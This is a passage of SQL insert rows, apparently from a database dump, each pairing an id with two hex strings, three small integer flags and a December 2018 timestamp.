(37799, '7a86c1f7667b367796e53032592b0484', 'c77bd0e6aa3ba09b', 0, 2, 1, '2018-12-12 19:07:02'),
(37800, '637f1a3a83efb78fbb11c1e430240c24', '687058b58830fd3e', 0, 2, 1, '2018-12-12 19:07:18'),
(37801, '219462175ef1a8b5a3e3db724fb84df7', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-12 19:07:26'),
(37802, '11e3a3ba1f3d8ba351adcda846b23a99', 'bb3464a656ac2271', 0, 2, 1, '2018-12-12 19:07:48'),
(37803, '089e8d68c7350e6388cf9683021c4e7c', 'dace6e0c219330fc', 0, 2, 1, '2018-12-12 19:07:53'),
(37804, 'e86a6dab8b3b3b8ea9737b2f277b555c', '718410b9de7a40b0', 0, 2, 1, '2018-12-12 19:08:19'),
(37805, '3b62d215e33e2b5dab3d6478d95127f9', 'c423a976f7958be7', 0, 2, 1, '2018-12-12 19:08:24'),
(37806, '7395857db0c5f137876f2ecca6d606b3', '32b169e936bbe5df', 0, 2, 1, '2018-12-12 19:09:12'),
(37807, '84ec41653f75d8dadfc20fef599bb4d7', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-12 19:10:42'),
(37808, '84ec41653f75d8dadfc20fef599bb4d7', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-12 19:11:06'),
(37809, '86431cb6e57feb60e6c66001721ab862', 'f11ab2838fdcb085', 0, 2, 1, '2018-12-12 19:11:56'),
(37810, 'ac8a68181d6fc83f7fc30b0e34d76633', '74aba437eea39f30', 0, 2, 1, '2018-12-12 19:12:00'),
(37811, 'b1a8d4db2556f1253f2618a9060ceb46', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-12 19:12:33'),
(37812, '84ec41653f75d8dadfc20fef599bb4d7', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-12 19:12:50'),
(37813, '637f1a3a83efb78fbb11c1e430240c24', '687058b58830fd3e', 0, 2, 1, '2018-12-12 19:12:56'),
(37814, '86431cb6e57feb60e6c66001721ab862', 'f11ab2838fdcb085', 0, 2, 1, '2018-12-12 19:12:57'),
(37815, '86431cb6e57feb60e6c66001721ab862', 'f11ab2838fdcb085', 0, 2, 1, '2018-12-12 19:13:05'),
(37816, '6da42dd59c076f077432ced924a2a73c', 'a30c08bfcb146c2b', 0, 2, 1, '2018-12-12 19:13:11'),
(37817, 'dcaf3212b83a730f2b8712f17f03e326', 'c123e74a1d22036a', 0, 2, 1, '2018-12-12 19:13:17'),
(37818, '11e3a3ba1f3d8ba351adcda846b23a99', 'bb3464a656ac2271', 0, 2, 1, '2018-12-12 19:13:24'),
(37819, '11e3a3ba1f3d8ba351adcda846b23a99', 'bb3464a656ac2271', 0, 2, 1, '2018-12-12 19:13:30'),
(37820, '0db3c6281e82b47a20d1ac6f5e60270a', '2090dcc3f13059c6', 0, 2, 1, '2018-12-12 19:13:32'),
(37821, '7a86c1f7667b367796e53032592b0484', 'c77bd0e6aa3ba09b', 0, 2, 1, '2018-12-12 19:13:42'),
(37822, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 19:14:00'),
(37823, '87f3490830b98157ac2e08f9471ba173', 'e706e9a0184b2202', 0, 2, 1, '2018-12-12 19:14:57'),
(37824, '0db3c6281e82b47a20d1ac6f5e60270a', '2090dcc3f13059c6', 0, 2, 1, '2018-12-12 19:15:07'),
(37825, '0db3c6281e82b47a20d1ac6f5e60270a', '2090dcc3f13059c6', 0, 2, 1, '2018-12-12 19:15:46'),
(37826, 'ca804144531391f4b20482958a57d3a9', '1de090ec808c88cc', 0, 2, 1, '2018-12-12 19:16:39'),
(37827, 'a1adbc01000308145f739380f3582460', 'e38fbc76ae580892', 0, 2, 1, '2018-12-12 19:17:38'),
(37828, '49c23b898578d96678a32c5f260a91ea', '2b4b26d386957b28', 0, 2, 1, '2018-12-12 19:19:36'),
(37829, '49c23b898578d96678a32c5f260a91ea', '2b4b26d386957b28', 0, 2, 1, '2018-12-12 19:19:53'),
(37830, '708a67d015ad6420168cc9b5ea3365f9', '77a26fed4379afb8', 0, 2, 1, '2018-12-12 19:22:59'),
(37831, '708a67d015ad6420168cc9b5ea3365f9', '77a26fed4379afb8', 0, 2, 1, '2018-12-12 19:23:09'),
(37832, '708a67d015ad6420168cc9b5ea3365f9', '77a26fed4379afb8', 0, 2, 1, '2018-12-12 19:23:17'),
(37833, '708a67d015ad6420168cc9b5ea3365f9', '77a26fed4379afb8', 0, 2, 1, '2018-12-12 19:23:25'),
(37834, '2be0b3f4949b2452eab21965873d2711', '1d40a9c17873b96c', 0, 2, 1, '2018-12-12 19:23:31'),
(37835, 'ed1b61148150de3bb7a20e9d5afc29cb', '353e2c8924436e84', 0, 2, 1, '2018-12-12 19:24:04'),
(37836, '9c186ce14dd4299b29c669e749faccc7', '8a9a355b6c67c74a', 0, 2, 1, '2018-12-12 19:24:36'),
(37837, 'ed1b61148150de3bb7a20e9d5afc29cb', '353e2c8924436e84', 0, 2, 1, '2018-12-12 19:24:56'),
(37838, 'b1a8d4db2556f1253f2618a9060ceb46', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-12 19:26:24'),
(37839, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 19:26:31'),
(37840, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 19:28:41'),
(37841, '49c23b898578d96678a32c5f260a91ea', '2b4b26d386957b28', 0, 2, 1, '2018-12-12 19:29:08'),
(37842, '84ec41653f75d8dadfc20fef599bb4d7', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-12 19:29:13'),
(37843, '219462175ef1a8b5a3e3db724fb84df7', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-12 19:29:22'),
(37844, '84ec41653f75d8dadfc20fef599bb4d7', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-12 19:29:36'),
(37845, 'b1a8d4db2556f1253f2618a9060ceb46', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-12 19:29:38'),
(37846, '637f1a3a83efb78fbb11c1e430240c24', '687058b58830fd3e', 0, 2, 1, '2018-12-12 19:29:39'),
(37847, '87f3490830b98157ac2e08f9471ba173', 'e706e9a0184b2202', 0, 2, 1, '2018-12-12 19:29:53'),
(37848, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 19:30:15'),
(37849, '87f3490830b98157ac2e08f9471ba173', 'e706e9a0184b2202', 0, 2, 1, '2018-12-12 19:30:22'),
(37850, '0db3c6281e82b47a20d1ac6f5e60270a', '2090dcc3f13059c6', 0, 2, 1, '2018-12-12 19:31:51'),
(37851, 'e86a6dab8b3b3b8ea9737b2f277b555c', '718410b9de7a40b0', 0, 2, 1, '2018-12-12 19:32:35'),
(37852, 'bcbdd6833c965ea462cf30f7bc143b26', '2034f09284a4c7ca', 0, 2, 1, '2018-12-12 19:32:39'),
(37853, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 19:34:40'),
(37854, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 19:36:50'),
(37855, '19e65b46084105f79656d32c6b5f8d03', '84c73015e9e28e8a', 0, 2, 1, '2018-12-12 19:38:03'),
(37856, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 19:38:10'),
(37857, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 19:39:07'),
(37858, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 19:41:54'),
(37859, 'd3b35a6a29dfaf01d8cd609b35730997', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-12 19:42:32'),
(37860, 'dcaf3212b83a730f2b8712f17f03e326', 'c123e74a1d22036a', 0, 2, 1, '2018-12-12 19:43:17'),
(37861, 'dcaf3212b83a730f2b8712f17f03e326', 'c123e74a1d22036a', 0, 2, 1, '2018-12-12 19:43:26'),
(37862, 'b3af068d1ea33aa1ce6ccd70b22393af', '21f5d356a659133c', 0, 2, 1, '2018-12-12 19:44:11'),
(37863, 'b3af068d1ea33aa1ce6ccd70b22393af', '21f5d356a659133c', 0, 2, 1, '2018-12-12 19:44:27'),
(37864, 'b3af068d1ea33aa1ce6ccd70b22393af', '21f5d356a659133c', 0, 2, 1, '2018-12-12 19:44:36'),
(37865, '7a86c1f7667b367796e53032592b0484', 'c77bd0e6aa3ba09b', 0, 2, 1, '2018-12-12 19:59:43'),
(37866, '20d7b1a32177031915f6abec4a343bb7', '4c07673592205f17', 0, 2, 1, '2018-12-12 20:03:18'),
(37867, 'ac805107fd67c9a9d5b634272e30adce', 'acca36875de5f3ac', 0, 2, 1, '2018-12-12 20:04:17'),
(37868, 'af7ee2ba494c95ca79caad3b3013f0c1', 'c6fd10ccde65bc24', 0, 2, 1, '2018-12-12 20:08:31'),
(37869, 'bb040e064d84721b9ecc3e839178ace2', 'dea6dcd8d8bf7f3b', 0, 2, 1, '2018-12-12 20:09:11'),
(37870, 'cc3837374fe2f031a01514b14ce7cbe6', 'f26d8b31a980dde3', 0, 2, 1, '2018-12-12 20:09:46'),
(37871, 'af7ee2ba494c95ca79caad3b3013f0c1', 'c6fd10ccde65bc24', 0, 2, 1, '2018-12-12 20:10:25'),
(37872, 'bc4dbb4e3967f3bf34e13f885eb075f9', 'da6c922121ca1f89', 0, 2, 1, '2018-12-12 20:14:27'),
(37873, '01109f12e8e5ddfb537cbece66b8791e', '97e9ce844f1bf126', 0, 2, 1, '2018-12-12 20:53:26'),
(37874, '481b8f61953e508e307df51e5456222d', '0d58619db377131c', 0, 2, 1, '2018-12-12 20:53:27'),
(37875, '2ec64134c64988f923db25872482fa60', '3ba3484de462963c', 0, 2, 1, '2018-12-12 21:07:47'),
(37876, 'c4e94b2e7657142629da58b12e111cf7', 'c211edf92a859bf2', 0, 2, 1, '2018-12-12 21:20:52'),
(37877, '6ec3d0af50e46e6c36c739db958523e1', '85fbf6551e3e1a54', 0, 2, 1, '2018-12-12 21:30:49'),
(37878, '6ec3d0af50e46e6c36c739db958523e1', '85fbf6551e3e1a54', 0, 2, 1, '2018-12-12 21:32:58'),
(37879, '69df7b477d8aed2e9bbce131d28ea91e', '5bfac0437d4e8380', 0, 2, 1, '2018-12-12 21:41:08'),
(37880, 'f7d39e88e87a0be94d3d7cbafdc0e496', '5d05c790f4830fad', 0, 2, 1, '2018-12-12 21:57:44'),
(37881, '99289bb1a82ec8088006cf797695d871', '1c2bd354bcce047b', 0, 2, 1, '2018-12-12 21:58:15'),
(37882, 'bb040e064d84721b9ecc3e839178ace2', 'dea6dcd8d8bf7f3b', 0, 2, 1, '2018-12-12 22:10:55'),
(37883, '6061ebb123bec4fcc3c3827c3c0cd2a5', 'c6fd10ccde65bc24', 0, 2, 1, '2018-12-12 22:16:07'),
(37884, 'c3cc5b24832c9eb2e959ba223441d5ea', '2c548e5e569f21c8', 0, 2, 1, '2018-12-12 22:19:52'),
(37885, 'c722759170703d15eed6131e17c7c467', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-12 22:26:18'),
(37886, '4ef558509633c669357cda99d2f2302b', '5e1ee87ab8bb4a01', 0, 2, 1, '2018-12-12 22:50:02'),
(37887, 'f33a28fbae3d6d4429dde80f8145a82f', '1f77291650b3355e', 0, 2, 1, '2018-12-12 23:25:32'),
(37888, '3dd85000d897a8d0377152cecc98a836', '9761299e82edfe41', 0, 2, 1, '2018-12-12 23:40:30'),
(37889, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-12 23:42:31'),
(37890, '6492c0514c539b946341f7b926390627', '1ec0238dc67a6f8e', 0, 2, 1, '2018-12-13 00:17:22'),
(37891, '9605264480a7074a9d656233861b8ee8', '50d02461c9e1908b', 0, 2, 1, '2018-12-13 00:18:33'),
(37892, 'f9f60c619e98990fadea2a3a97c948a9', '7c5bcf99f2070582', 0, 2, 1, '2018-12-13 00:54:47'),
(37893, 'f9f60c619e98990fadea2a3a97c948a9', '7c5bcf99f2070582', 0, 2, 1, '2018-12-13 00:55:17'),
(37894, '3a0d4e23d48217abe7e8619f0271c8a7', 'acd1e7ad57e0bf4d', 0, 2, 1, '2018-12-13 01:39:18'),
(37895, 'd5bfd20522b3e33c03b4cba6a1fccd1d', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-13 02:15:43'),
(37896, 'd5bfd20522b3e33c03b4cba6a1fccd1d', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-13 02:15:53'),
(37897, 'ab0692e8b376b29a1303c49b15db725a', 'cfa25db1eefd0d2a', 0, 2, 1, '2018-12-13 03:06:09'),
(37898, 'd9872723d544ea7b7dc1fae5c5c64e37', 'b11c85d4438393db', 0, 2, 1, '2018-12-13 04:05:08'),
(37899, 'd9872723d544ea7b7dc1fae5c5c64e37', 'b11c85d4438393db', 0, 2, 1, '2018-12-13 04:08:26'),
(37900, '75fe88a06763082844ac93f700550468', 'fbf0576065758144', 0, 2, 1, '2018-12-13 04:09:21'),
(37901, '66cfc9d307aea224fd4c4738afc409fc', '0baef9102f01bba0', 0, 2, 1, '2018-12-13 04:13:37'),
(37902, '66cfc9d307aea224fd4c4738afc409fc', '0baef9102f01bba0', 0, 2, 1, '2018-12-13 04:25:13'),
(37903, '66cfc9d307aea224fd4c4738afc409fc', '0baef9102f01bba0', 0, 2, 1, '2018-12-13 04:29:57'),
(37904, '66cfc9d307aea224fd4c4738afc409fc', '0baef9102f01bba0', 0, 2, 1, '2018-12-13 04:31:11'),
(37905, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-13 04:32:35'),
(37906, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-13 04:33:45'),
(37907, 'cffbc7252b4763267c5a0092419cb081', 'cfa25db1eefd0d2a', 0, 2, 1, '2018-12-13 04:34:28'),
(37908, '4c8af064a305b9713e51accf0a6a4ffc', '3de88ff4581dab27', 0, 2, 1, '2018-12-13 04:37:39'),
(37909, '652bb28800888f8ef5602a8b342b9c3b', 'fbbefb87899022b2', 0, 2, 1, '2018-12-13 04:48:16'),
(37910, '1db918ee3eb00e75257fda4fc1c9465e', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-13 04:57:41'),
(37911, '09d85db781ca7980b65c5554264fcf72', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-13 05:01:46'),
(37912, '4c8af064a305b9713e51accf0a6a4ffc', '3de88ff4581dab27', 0, 2, 1, '2018-12-13 05:03:03'),
(37913, 'd03214ad68d74b6fc736e0879fc73852', 'c82195f7827b9487', 0, 2, 1, '2018-12-13 05:04:54'),
(37914, 'd03214ad68d74b6fc736e0879fc73852', 'c82195f7827b9487', 0, 2, 1, '2018-12-13 05:05:14'),
(37915, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-13 05:06:04'),
(37916, 'a02f80471643e84ec49b1cda6fdffba1', '553b9f0a18b97af8', 0, 2, 1, '2018-12-13 05:06:49'),
(37917, '8e008a02a85d248dcafb605a9453a744', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-13 05:08:59'),
(37918, '4c8af064a305b9713e51accf0a6a4ffc', '3de88ff4581dab27', 0, 2, 1, '2018-12-13 05:09:19'),
(37919, '4b7fdde4ccbebb3f1850c972f449cbd3', '0b96637e546eb7c5', 0, 2, 1, '2018-12-13 05:09:36'),
(37920, '8e008a02a85d248dcafb605a9453a744', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-13 05:10:29'),
(37921, '1db918ee3eb00e75257fda4fc1c9465e', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-13 05:11:10'),
(37922, '1ad4aecce8e2197d40aca34450e3d763', '573a2d4ca6fc95b1', 0, 2, 1, '2018-12-13 05:12:25'),
(37923, 'b43cf2c48c18ab2833bac2ffb08532ba', '525abb4dc04ca54a', 0, 2, 1, '2018-12-13 05:12:49'),
(37924, 'd69081931e95a93c7a027e669a31960f', '4cfda9df5c8ebf2f', 0, 2, 1, '2018-12-13 05:13:12'),
(37925, '8e008a02a85d248dcafb605a9453a744', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-13 05:15:31'),
(37926, 'b37cf26f4b0cad7f821451d86ab8272a', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-13 05:16:52'),
(37927, 'b37cf26f4b0cad7f821451d86ab8272a', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-13 05:18:26'),
(37928, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-13 05:18:30'),
(37929, '47072f8d9ade47ec20d5f7c60b2180d0', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-12-13 05:19:05'),
(37930, '1db918ee3eb00e75257fda4fc1c9465e', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-13 05:22:45'),
(37931, '1db918ee3eb00e75257fda4fc1c9465e', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-13 05:27:16'),
(37932, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-13 05:28:15'),
(37933, 'b37cf26f4b0cad7f821451d86ab8272a', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-13 05:29:46'),
(37934, 'b37cf26f4b0cad7f821451d86ab8272a', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-13 05:30:06'),
(37935, '4c1af58b362f41ecdc653e01ba1ce075', 'cd931064f096776b', 0, 2, 1, '2018-12-13 05:30:30'),
(37936, 'b37cf26f4b0cad7f821451d86ab8272a', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-13 05:30:30'),
(37937, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-13 05:30:37'),
(37938, 'ca93dcc866c6aa8760e8f9c5680a8a25', 'b3e086714401d576', 0, 2, 1, '2018-12-13 05:30:49'),
(37939, '0174b6c99eb9a43823cd1d74542c9e67', 'a06df92c3e268263', 0, 2, 1, '2018-12-13 05:30:55'),
(37940, 'b91d5b9eba69ee8c00f03eaca72c0c87', '0902ab385ee8a898', 0, 2, 1, '2018-12-13 05:31:01'),
(37941, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-13 05:31:07'),
(37942, '4c1af58b362f41ecdc653e01ba1ce075', 'cd931064f096776b', 0, 2, 1, '2018-12-13 05:31:16'),
(37943, 'de9cffeb3089695242b923e54a69ac37', '9a1a9db6d4db8522', 0, 2, 1, '2018-12-13 05:31:18'),
(37944, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-13 05:31:19'),
(37945, '0174b6c99eb9a43823cd1d74542c9e67', 'a06df92c3e268263', 0, 2, 1, '2018-12-13 05:31:19'),
(37946, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-12-13 05:31:37'),
(37947, '6381dc9600cbf61ce7ff7fd89515d6cf', '687058b58830fd3e', 0, 2, 1, '2018-12-13 05:31:45'),
(37948, '0174b6c99eb9a43823cd1d74542c9e67', 'a06df92c3e268263', 0, 2, 1, '2018-12-13 05:31:49'),
(37949, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-13 05:31:55'),
(37950, 'ce7f6d8efbd4c3bda4b534c2dc146ee1', '5a883dd79dd2a20d', 0, 2, 1, '2018-12-13 05:32:04'),
(37951, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-13 05:32:16'),
(37952, '6bc15dafd03c7fa717e345becb0aec80', 'df27b9a2919a8206', 0, 2, 1, '2018-12-13 05:32:17'),
(37953, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-13 05:32:18'),
(37954, 'ce7f6d8efbd4c3bda4b534c2dc146ee1', '5a883dd79dd2a20d', 0, 2, 1, '2018-12-13 05:32:20'),
(37955, 'd69081931e95a93c7a027e669a31960f', '4cfda9df5c8ebf2f', 0, 2, 1, '2018-12-13 05:32:24'),
(37956, 'b37cf26f4b0cad7f821451d86ab8272a', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-13 05:32:39'),
(37957, 'dfb729dae183829fa95a36625ccfea76', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-13 05:32:48'),
(37958, '60375b551575fbddac42e24a3ccf9ef8', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-13 05:32:54'),
(37959, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-13 05:33:05'),
(37960, 'd03214ad68d74b6fc736e0879fc73852', 'c82195f7827b9487', 0, 2, 1, '2018-12-13 05:33:11'),
(37961, '77cd87d9c3d9af832d8b70cb286b7d3a', 'ee048a80ed202af2', 0, 2, 1, '2018-12-13 05:33:14'),
(37962, 'd03214ad68d74b6fc736e0879fc73852', 'c82195f7827b9487', 0, 2, 1, '2018-12-13 05:33:16'),
(37963, '77cd87d9c3d9af832d8b70cb286b7d3a', 'ee048a80ed202af2', 0, 2, 1, '2018-12-13 05:33:22'),
(37964, '6381dc9600cbf61ce7ff7fd89515d6cf', '687058b58830fd3e', 0, 2, 1, '2018-12-13 05:33:25'),
(37965, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-13 05:33:27'),
(37966, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-13 05:33:37'),
(37967, '6381dc9600cbf61ce7ff7fd89515d6cf', '687058b58830fd3e', 0, 2, 1, '2018-12-13 05:33:49'),
(37968, '8f5045324d0b409b8638fa9c1727d3f8', '614fcbb79b5160d2', 0, 2, 1, '2018-12-13 05:33:53'),
(37969, '77cd87d9c3d9af832d8b70cb286b7d3a', 'ee048a80ed202af2', 0, 2, 1, '2018-12-13 05:34:03'),
(37970, 'd03214ad68d74b6fc736e0879fc73852', 'c82195f7827b9487', 0, 2, 1, '2018-12-13 05:34:40'),
(37971, '77cd87d9c3d9af832d8b70cb286b7d3a', 'ee048a80ed202af2', 0, 2, 1, '2018-12-13 05:34:48'),
(37972, 'ce7f6d8efbd4c3bda4b534c2dc146ee1', '5a883dd79dd2a20d', 0, 2, 1, '2018-12-13 05:34:48'),
(37973, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-13 05:34:54'),
(37974, 'b16cac96762df95dea20cb1d21b3a19c', '3b4446abb707e8c0', 0, 2, 1, '2018-12-13 05:35:11'),
(37975, 'fb55516f807553a3d6c6eb6c64a22384', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-13 05:35:14'),
(37976, '4c62d5d163a759e8870cb279410e5c44', '2034f09284a4c7ca', 0, 2, 1, '2018-12-13 05:35:18'),
(37977, '6381dc9600cbf61ce7ff7fd89515d6cf', '687058b58830fd3e', 0, 2, 1, '2018-12-13 05:35:18'),
(37978, '6381dc9600cbf61ce7ff7fd89515d6cf', '687058b58830fd3e', 0, 2, 1, '2018-12-13 05:35:29'),
(37979, '0ee3696146f8d8e8bbfa5d86f9a4aa36', 'b2e78912dacced42', 0, 2, 1, '2018-12-13 05:35:32'),
(37980, '0ee3696146f8d8e8bbfa5d86f9a4aa36', 'b2e78912dacced42', 0, 2, 1, '2018-12-13 05:35:45'),
(37981, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-13 05:36:00'),
(37982, 'b16cac96762df95dea20cb1d21b3a19c', '3b4446abb707e8c0', 0, 2, 1, '2018-12-13 05:36:03'),
(37983, 'ad17320fc6a8889a88930a84acb16a33', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-12-13 05:36:12'),
(37984, '60375b551575fbddac42e24a3ccf9ef8', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-13 05:36:13'),
(37985, '0ee3696146f8d8e8bbfa5d86f9a4aa36', 'b2e78912dacced42', 0, 2, 1, '2018-12-13 05:36:19'),
(37986, 'ca93dcc866c6aa8760e8f9c5680a8a25', 'b3e086714401d576', 0, 2, 1, '2018-12-13 05:36:23'),
(37987, '2c7a51387f9200b2655f47b8612d9ceb', 'a06df92c3e268263', 0, 2, 1, '2018-12-13 05:36:33'),
(37988, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-13 05:36:57'),
(37989, '7eea67bef7fe1815e412312d6e486e09', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-13 05:36:57'),
(37990, '09d85db781ca7980b65c5554264fcf72', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-13 05:37:01'),
(37991, '2c7a51387f9200b2655f47b8612d9ceb', 'a06df92c3e268263', 0, 2, 1, '2018-12-13 05:37:40'),
(37992, 'd4287c6ba976cf29fdcf90690678f8f3', '6a4507b4da55ef6e', 0, 2, 1, '2018-12-13 05:38:16'),
(37993, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-13 05:38:37'),
(37994, '23b63ad63f407f851bb4085730071983', '7501b42c35accff7', 0, 2, 1, '2018-12-13 05:38:47'),
(37995, 'bd1b74971258c8f51195ccc3a732f5df', 'e706e9a0184b2202', 0, 2, 1, '2018-12-13 05:38:56'),
(37996, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-13 05:39:00'),
(37997, 'd03214ad68d74b6fc736e0879fc73852', 'c82195f7827b9487', 0, 2, 1, '2018-12-13 05:39:08'),
(37998, '137f98a4b2a4487f27506ab6b0d9b4df', '3f3f39769ae28e7a', 0, 2, 1, '2018-12-13 05:39:10'),
(37999, 'bd1b74971258c8f51195ccc3a732f5df', 'e706e9a0184b2202', 0, 2, 1, '2018-12-13 05:39:30'),
(38000, '17e3afaebfb715a072ec12308fdc976f', 'c0d620ee8725a926', 0, 2, 1, '2018-12-13 05:39:31'),
(38001, '8b66f75e722a8afce4369fdd53c59338', '46713cac27a94b83', 0, 2, 1, '2018-12-13 05:39:34'),
(38002, '8dc3652afef19217e994ec4b9ae2eed8', '0d3b5271c2ab69e3', 0, 2, 1, '2018-12-13 05:39:37'),
(38003, '8b66f75e722a8afce4369fdd53c59338', '46713cac27a94b83', 0, 2, 1, '2018-12-13 05:39:44'),
(38004, 'fb55516f807553a3d6c6eb6c64a22384', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-13 05:39:54'),
(38005, 'ca93dcc866c6aa8760e8f9c5680a8a25', 'b3e086714401d576', 0, 2, 1, '2018-12-13 05:39:57'),
(38006, 'b37cf26f4b0cad7f821451d86ab8272a', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-13 05:40:02'),
(38007, '4c62d5d163a759e8870cb279410e5c44', '2034f09284a4c7ca', 0, 2, 1, '2018-12-13 05:40:15'),
(38008, 'd959ebad6b1793d84ad647b441afce77', '196ae7616c94df27', 0, 2, 1, '2018-12-13 05:40:43'),
(38009, 'd959ebad6b1793d84ad647b441afce77', '196ae7616c94df27', 0, 2, 1, '2018-12-13 05:40:52'),
(38010, 'b16cac96762df95dea20cb1d21b3a19c', '3b4446abb707e8c0', 0, 2, 1, '2018-12-13 05:40:59'),
(38011, '8442cf82e8788612aa965c07f3b92201', '8ad007cf09224cd8', 0, 2, 1, '2018-12-13 05:41:09'),
(38012, '8442cf82e8788612aa965c07f3b92201', '8ad007cf09224cd8', 0, 2, 1, '2018-12-13 05:41:29'),
(38013, '7eea67bef7fe1815e412312d6e486e09', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-13 05:41:33'),
(38014, 'fb55516f807553a3d6c6eb6c64a22384', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-13 05:41:57'),
(38015, '7eea67bef7fe1815e412312d6e486e09', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-13 05:42:03'),
(38016, '7eea67bef7fe1815e412312d6e486e09', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-13 05:42:19'),
(38017, 'ad09e2b004c7b3fe8cb8a2caf5525556', '2e3bbbd2fd7c408d', 0, 2, 1, '2018-12-13 05:43:34'),
(38018, 'f5df2c5c883c3ecda21abdd91f2024ed', '74aba437eea39f30', 0, 2, 1, '2018-12-13 05:43:38'),
(38019, '97d4ab78e82b275ca2193864b86e48d0', '175b72b9380c40ec', 0, 2, 1, '2018-12-13 05:43:46'),
(38020, '6e2779a3ea43d84d4daba81515925775', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-13 05:44:05'),
(38021, '1214d7c934534758cbf90be682855bac', '9968c5be4a7971a2', 0, 2, 1, '2018-12-13 05:44:07'),
(38022, 'bdd836357018b2a7d0473f28d34b3143', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-13 05:44:10'),
(38023, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-13 05:45:47'),
(38024, '3daaa9f3de9e60252a3c61ce9f89c9d7', 'bc5a9dc728ad22f7', 0, 2, 1, '2018-12-13 05:46:56'),
(38025, '3daaa9f3de9e60252a3c61ce9f89c9d7', 'bc5a9dc728ad22f7', 0, 2, 1, '2018-12-13 05:47:12'),
